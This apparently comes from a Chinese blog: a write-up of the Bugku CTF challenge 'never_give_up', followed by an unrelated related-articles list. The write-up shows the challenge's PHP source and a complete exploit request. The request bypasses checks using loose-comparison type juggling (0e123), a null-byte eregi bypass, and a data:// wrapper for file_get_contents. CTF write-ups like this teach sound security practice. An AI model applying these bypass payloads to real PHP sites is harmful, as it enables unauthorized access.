never_give_up

embedded/2025/3/13 15:56:46/

一个很有意思的题:
never_give_up - Bugku CTF平台

注意到注释里面有1p.html,我们直接在源代码界面看,这样就不会跳转到它那个链接的:

然后解码可得:

";if(!$_GET['id'])
{header('Location: hello.php?id=1');exit();
}$id=$_GET['id'];$a=$_GET['a'];$b=$_GET['b'];
if(stripos($a,'.'))
{echo 'no no no no no no no';return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{$flag = "flag{***********}"
}
else
{print "never never never give up !!!";
}?>

实际上就是这三个条件,

  1. id=0e123即可,php读入直接会是0
  2. b这里要求长度大于5,第一个不能是4,但是又要和1114匹配,这里直接用字符就可以绕过b=%0011111
  3. a这里要使用file_get_contents的漏洞,可以使用php://input和data://text/plain,但是我的bp版本高好像php://input没用了,所以这里用后者代替把字符串输进去

GET /hello.php?id=0e123456&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%0011111 HTTP/1.1

在burp加上这么一句即可:


http://www.ppmy.cn/embedded/172289.html

相关文章

Pandas数据清洗实战之清洗猫眼电影

Pandas数据清洗实战之清洗猫眼电影

本次案例所需要用到的模块 pandas(文件读取保存 操作表格的模块) 将上次Scrapy爬取下来的文件 做个数据清洗 变成我们想要的数据 确定目的:将此文件中的duration字段中的分钟 和publisher_time上映去掉 只保留纯数值 数据清洗题目如下: 修复 publish_time列中的错…
阅读更多...
基于Tkinter与DeepSeek API的多模型智能聊天系统设计与实现

基于Tkinter与DeepSeek API的多模型智能聊天系统设计与实现

基于Tkinter与DeepSeek API的多模型智能聊天系统设计与实现 一、系统概述 本文介绍一款基于Python Tkinter GUI框架和DeepSeek API开发的智能聊天系统。该系统具备多模型切换、主题定制、对话管理三大核心功能,采用模块化设计实现高效的异步通信机制。程序支持Win…
阅读更多...
数势科技黎科峰:DeepSeek 引爆数据分析“奇点”,创造普惠化新机遇丨数据猿专访...

数势科技黎科峰:DeepSeek 引爆数据分析“奇点”,创造普惠化新机遇丨数据猿专访...

大数据产业创新服务媒体 ——聚焦数据 改变商业 2025年国内人工智能“春天”的脚步竟然来得如此急促。当人们还沉浸在春节假期之中,一场波及多个行业的巨变悄然发生,1月20日,DeepSeek R1横空出世,打破了先前多数投资人保守的“判…
阅读更多...
本地部署资源聚合搜索神器 Jackett 并实现外部访问

本地部署资源聚合搜索神器 Jackett 并实现外部访问

Jackett 是一款免费的开源跨平台的资源聚合搜索软件。它支持众多种子站和网盘站,可以作为代理服务器通过 API 来响应来自应用程序,然后将结果发送回请求软件‌。而且支持跨平台。 本文将详细的介绍如何利用 Docker 在本地部署 Jackett 并结合路由侠实现…
阅读更多...
国产FPGA往事

国产FPGA往事

本原创文章由深圳市小眼睛科技有限公司创作,版权归本公司所有,如需转载,需授权并注明出处(www.meyesemi.com) 我去年和紫光同创原厂的技术专家写了一本书——《国产FPGA权威开发指南》,我想请FPGA开发者同行多多指点和…
阅读更多...
无需 Docker 也能下载镜像!轻松获取 Docker 镜像文件!

无需 Docker 也能下载镜像!轻松获取 Docker 镜像文件!

背景问题 在日常开发或运维工作中,我们经常需要下载 Docker 镜像,但可能会遇到以下问题: 🔹 服务器无法访问 Docker Hub,导致 docker pull 失败。 🔹 Windows 端没有安装 Docker,但仍然需要获…
阅读更多...
【江协科技STM32】ADC数模转换器-学习笔记

【江协科技STM32】ADC数模转换器-学习笔记

ADC简介 ADC(Analog-Digital Converter)模拟-数字转换器ADC可以将引脚上连续变化的模拟电压转换为内存中存储的数字变量,建立模拟电路到数字电路的桥梁,ADC是一种将连续的模拟信号转换为离散的数字信号的设备或模块12位逐次逼近型…
阅读更多...
µCOS-III从入门到精通 第十三章(事件标志组)

µCOS-III从入门到精通 第十三章(事件标志组)

参考教程:【正点原子】手把手教你学UCOS-III实时操作系统_哔哩哔哩_bilibili 一、事件标志组简介 1、概述 (1)事件标志位是一个“位”,用来表示事件是否发生。 (2)事件标志组是一组事件标志位的集合&am…
阅读更多...
最新文章

Copyright @ 2022~2023